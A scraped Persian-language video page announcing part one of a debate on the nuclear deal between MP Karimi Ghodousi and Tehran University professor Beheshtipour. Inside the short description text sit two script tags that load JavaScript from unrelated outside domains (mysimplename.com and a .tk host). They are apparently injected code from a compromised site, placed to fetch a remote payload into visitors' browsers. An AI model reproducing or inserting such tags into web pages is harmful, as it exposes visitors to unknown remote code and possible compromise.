مناظره هسته ای: کریمی قدوسی و بهشتی پور (بخش اول)


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>مناظره جنجالی هسته ای با حضور آقایان کریمی قدوسی نماینده مجلس و دکتر بهشتی پور استاد دانشگاه تهران پیرامون توافق برجام<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر